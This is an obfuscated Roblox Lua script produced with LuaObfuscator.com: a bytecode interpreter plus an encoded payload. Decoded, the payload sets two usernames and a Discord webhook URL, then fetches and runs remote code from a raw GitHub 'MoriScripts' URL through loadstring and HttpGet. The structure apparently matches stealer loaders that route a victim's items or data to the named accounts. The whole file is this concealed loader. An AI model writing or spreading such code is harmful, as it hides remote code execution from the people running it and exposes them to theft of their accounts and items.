--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v31,16));if v20 then local v102=v5(v86,v20);v20=nil;return v102;else return v86;end break;end end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v32=0;local v33;local v34;while true do if (v32==(2 -1)) then return (v34 * (732 -476)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + ((935 -(857 + 74)) -2) ;v32=620 -(555 + 64) ;end end end v24=nil;function v24()local v35=568 -(367 + 201) ;local v36;local v37;local v38;local v39;while true do if ((927 -(214 + 713))==v35) then v36,v37,v38,v39=v1(v16,v19,v19 + 1 + 2 );v19=v19 + 1 + 3 ;v35=1;end if ((878 -(282 + 595))==v35) then return (v39 * ((23919788 -7140935) -((2588 -(68 + 997)) + (1384 -(226 + 1044))))) + (v38 * 65536) + (v37 * (231 + 25)) + v36 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v40,v41,v42)local v43=v40[1];local v44=v40[2];local v45=v40[3];return function(...)local v69=v43;local v70=v44;local v71=v45;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]();else local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==0) then v105=v81[2];v106,v107=v72(v79[v105](v13(v79,v105 + 1 ,v81[3])));v104=1;end if (v104==2) then for v131=v105,v74 do local v132=0;while true do if (v132==0) then v108=v108 + 1 ;v79[v131]=v106[v108];break;end end end break;end if (v104==1) then v74=(v107 + v105) -1 ;v108=0;v104=2;end end end elseif (v82<=2) then local v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));elseif (v82==3) then v79[v81[2]]=v81[3]~=0 ;else v79[v81[2]]=v42[v81[3]];end elseif (v82<=6) then if (v82>5) then local v111=0;local v112;local v113;while true do if (v111==0) then v112=v81[2];v113=v79[v81[3]];v111=1;end if (v111==1) then v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];break;end end else v79[v81[2]]=v81[3];end elseif (v82<=7) then do return;end elseif (v82>8) then local v119=0;local v120;local v121;while true do if (v119==2) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v42[v81[3]]=v79[v81[2]];v119=3;end if (v119==0) then v120=nil;v121=nil;v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v42[v81[3]]=v79[v81[2]];v119=1;end if (v119==4) then v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v120=v79[v81[3]];v79[v121 + 1 ]=v120;v79[v121]=v120[v81[4]];v119=5;end if (v119==1) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v42[v81[3]]=v79[v81[2]];v119=2;end if (v119==5) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];break;end if (v119==3) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v42[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v42[v81[3]];v119=4;end end else v42[v81[3]]=v79[v81[2]];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v46==(5 -3)) then local v93=0 -0 ;while true do if (1==v93) then v46=3 + 0 ;break;end if (v93==0) then v51=nil;v52=nil;v93=1475 -(1329 + 145) ;end end end if (v46~=0) then else local v94=0;while true do if (v94==(971 -(140 + 831))) then v47=0;v48=nil;v94=1851 -(1409 + 441) ;end if (v94==1) then v46=719 -(15 + 703) ;break;end end end if (1==v46) then local v95=0 + 0 ;while true do if (v95==(438 -(262 + 176))) then v49=nil;v50=nil;v95=1722 -(345 + 1376) ;end if (1~=v95) then else v46=690 -(198 + 490) ;break;end end end if (v46==(13 -10)) then v53=nil;while true do local v100=0;local v101;while true do if (v100~=(0 -0)) then else v101=1206 -(696 + 510) ;while true do if (v101~=0) then else local v124=0 -0 ;while true do if (1~=v124) then else v101=1263 -(1091 + 171) ;break;end if (v124==(0 + 0)) then if (v47~=2) then else local v159=0 -0 ;local v160;while true do if (v159~=0) then else v160=0;while true do local v167=0;while true do if (v167==(0 -0)) then if (v160==1) then return v51;end if (v160~=0) then else for v171=1,v24() do local v172=374 -(123 + 251) ;local v173;local v174;local v175;while true do if ((4 -3)~=v172) then else v175=nil;while true do if (v173~=1) then else while true do if (v174~=0) then else v175=v22();if (v21(v175,699 -(208 + 490) ,1 + 0 )==(0 + 0)) then local v178=0;local v179;local v180;local v181;local v182;local v183;local v184;while true do if (v178~=2) then else v183=nil;v184=nil;v178=839 -(660 + 176) ;end if (v178==0) then v179=0 + 0 ;v180=nil;v178=1;end if (v178==(203 -(14 + 188))) then v181=nil;v182=nil;v178=677 -(534 + 141) ;end if ((2 + 1)==v178) then while true do if ((2 + 0)==v179) then v184=nil;while true do if (v180==1) then v183=nil;v184=nil;v180=2 + 0 ;end if (v180~=(3 -1)) then else while true do if (v181==3) then if (v21(v183,3,3)==(1 -0)) then v184[11 -7 ]=v53[v184[3 + 1 ]];end v48[v171]=v184;break;end if (1~=v181) then else local v188=0 + 0 ;local v189;local v190;while true do if (1~=v188) then else while true do if (v189==0) then v190=0;while true do if (v190~=1) then else v181=398 -(115 + 281) ;break;end if (v190==(0 -0)) then local v199=0;while true do if (v199==(1 + 0)) then v190=1;break;end if (v199~=(0 -0)) then else local v200=0;while true do if (v200==(3 -2)) then v199=868 -(550 + 317) ;break;end if (v200==0) then v184={v23(),v23(),nil,nil};if (v182==(0 -0)) then local v205=0;local v206;while true do if (v205~=(285 -(134 + 151))) then else v206=0;while true do if (v206~=(1665 -(970 + 695))) then else v184[3]=v23();v184[7 -3 ]=v23();break;end end break;end end elseif (v182==1) then v184[3]=v24();elseif (v182==(1992 -(582 + 1408))) then v184[10 -7 ]=v24() -((2 -0)^(60 -44)) ;elseif (v182~=3) then else local v211=1824 -(1195 + 629) ;local v212;local v213;while true do if ((1 -0)==v211) then while true do if (v212==0) then v213=0;while true do if ((241 -(187 + 54))~=v213) then else v184[3]=v24() -(2^(796 -(162 + 618))) ;v184[3 + 1 ]=v23();break;end end break;end end break;end if (v211==0) then v212=0;v213=nil;v211=1 + 0 ;end end end v200=1 -0 ;end end end end end end break;end end break;end if (v188==0) then v189=0 -0 ;v190=nil;v188=1 + 0 ;end end end if (v181==(1636 -(1373 + 263))) then local v191=1000 -(451 + 549) ;while true do if (v191==(1 + 0)) then v181=1 -0 ;break;end if (v191~=0) then else local v196=0;while true do if (v196~=1) then else v191=1 -0 ;break;end if (v196==(1384 -(746 + 638))) then v182=v21(v175,2,2 + 1 );v183=v21(v175,5 -1 ,6);v196=1;end end end end end if (v181~=(343 -(218 + 123))) then else local v192=0;local v193;while true do if (v192==(1581 -(1535 + 46))) then v193=0;while true do if (v193==(0 + 0)) then local v197=0;local v198;while true do if (v197==(0 + 0)) then v198=560 -(306 + 254) ;while true do if (v198==(0 + 0)) then if (v21(v183,1 -0 ,1468 -(899 + 568) )==(1 + 0)) then v184[2]=v53[v184[2]];end if (v21(v183,2,4 -2 )==1) then v184[3]=v53[v184[3]];end v198=604 -(268 + 335) ;end if (v198==(291 -(60 + 230))) then v193=573 -(426 + 146) ;break;end end break;end end end if (v193~=1) then else v181=1 + 2 ;break;end end break;end end end end break;end if (v180==(1456 -(282 + 1174))) then local v186=811 -(569 + 242) ;while true do if ((2 -1)==v186) then v180=1;break;end if (v186==(0 + 0)) then v181=1024 -(706 + 318) ;v182=nil;v186=1;end end end end break;end if (v179==(1251 -(721 + 530))) then v180=0;v181=nil;v179=1272 -(945 + 326) ;end if (v179==1) then local v185=0 -0 ;while true do if (v185==1) then v179=2;break;end if (v185==0) then v182=nil;v183=nil;v185=1 + 0 ;end end end end break;end end end break;end end break;end if (v173~=0) then else v174=0;v175=nil;v173=1;end end break;end if (v172==0) then v173=0;v174=nil;v172=701 -(271 + 429) ;end end end for v176=1 + 0 ,v24() do v49[v176-1 ]=v29();end v160=1501 -(1408 + 92) ;end break;end end end break;end end end if (1~=v47) then else v52=v24();v53={};for v162=1087 -(461 + 625) ,v52 do local v163=0;local v164;local v165;local v166;while true do if (v163==(1289 -(993 + 295))) then v166=nil;while true do if (v164==(0 + 0)) then local v169=0;while true do if (v169==(1171 -(418 + 753))) then v165=v22();v166=nil;v169=1;end if ((1 + 0)==v169) then v164=1;break;end end end if (v164==(1 + 0)) then if (v165==1) then v166=v22()~=(0 + 0) ;elseif (v165==(1 + 1)) then v166=v25();elseif (v165==3) then v166=v26();end v53[v162]=v166;break;end end break;end if (v163==(529 -(406 + 123))) then local v168=0;while true do if (v168~=0) then else v164=1769 -(1749 + 20) ;v165=nil;v168=1;end if (v168~=1) then else v163=1 + 0 ;break;end end end end end v51[3]=v22();v47=1324 -(1249 + 73) ;end v124=1 + 0 ;end end end if (v101==1) then if (v47==(1145 -(466 + 679))) then v48={};v49={};v50={};v51={v48,v49,nil,v50};v47=2 -1 ;end break;end end break;end end end break;end end end v18=5;end if (1==v18) then function v21(v54,v55,v56)if v56 then local v90=(v54/((5 -3)^(v55-((2004 -(17 + 86)) -(106 + 1794)))))%((1 + 1)^(((v56-(1 + 0 + 0)) -(v55-(2 -(1 -0)))) + (2 -1))) ;return v90-(v90%(115 -(4 + 110))) ;else local v91=0;local v92;while true do if (v91==0) then v92=(586 -(57 + 527))^(v55-1) ;return (((v54%(v92 + v92))>=v92) and (1428 -((118 -77) + 1386))) or 0 ;end end end end v22=nil;function v22()local v57=166 -(122 + 44) ;local v58;while true do if (v57==(1 -0)) then return v58;end if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v57=1 + 0 ;end end end v23=nil;v18=2;end if (v18==3) then function v25()local v59=0 -0 ;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==((48 + 18) -(11 + 19 + (81 -46)))) then v62=1 + 0 ;v63=(v21(v61,1,14 + 6 ) * ((1259 -(1043 + 214))^(120 -88))) + v60 ;v59=1214 -(323 + 889) ;end if (v59==(5 -3)) then v64=v21(v61,82 -61 ,1152 -(118 + 1003) );v65=((v21(v61,612 -(361 + 219) )==(321 -(53 + 267))) and  -((1580 -(373 + 829)) -(142 + 235))) or (1 + 0) ;v59=416 -(15 + 398) ;end if (v59==((1708 -(476 + 255)) -(553 + 424))) then v60=v24();v61=v24();v59=983 -(18 + (2094 -(369 + 761))) ;end if (v59==(3 + 0)) then if (v64==(0 + 0)) then if (v63==(0 -0)) then return v65 * (0 + 0) ;else local v103=0 + 0 + 0 ;while true do if (v103==0) then v64=1 + 0 ;v62=850 -(20 + 830) ;break;end end end elseif (v64==(1598 + 449)) then return ((v63==(126 -(116 + 10))) and (v65 * ((1 + 0)/(753 -(239 + (933 -419)))))) or (v65 * NaN) ;end return v8(v65,v64-(360 + (1255 -592)) ) * (v62 + (v63/((740 -(542 + 196))^(110 -58)))) ;end end end v26=nil;function v26(v66)local v67;if  not v66 then v66=v24();if (v66==(238 -(64 + 174))) then return "";end end v67=v3(v16,v19,(v19 + v66) -(1 + 0) );v19=v19 + v66 ;local v68={};for v83=1 -0 , #v67 do v68[v83]=v2(v1(v3(v67,v83,v83)));end return v6(v68);end v27=v24;v18=4;end end end v15("LOL!0A3O0003083O00557365724E616D6503083O00616E67727934323903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31353134332O3137353935333435373136322F6F716B394962454C536472464D2O655F78436C57346569503775375F676232644F5233533448666A534F545568735A7135756D4B37596233304B524D4A73693449735A4F03093O00557365724E616D6532030C3O004261626170726F3332383631030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00122O000100083O00202O00010001000900122O0003000A4O0003000400014O0001000100044O00025O00026O000100012O00073O00017O00",v9(),...);
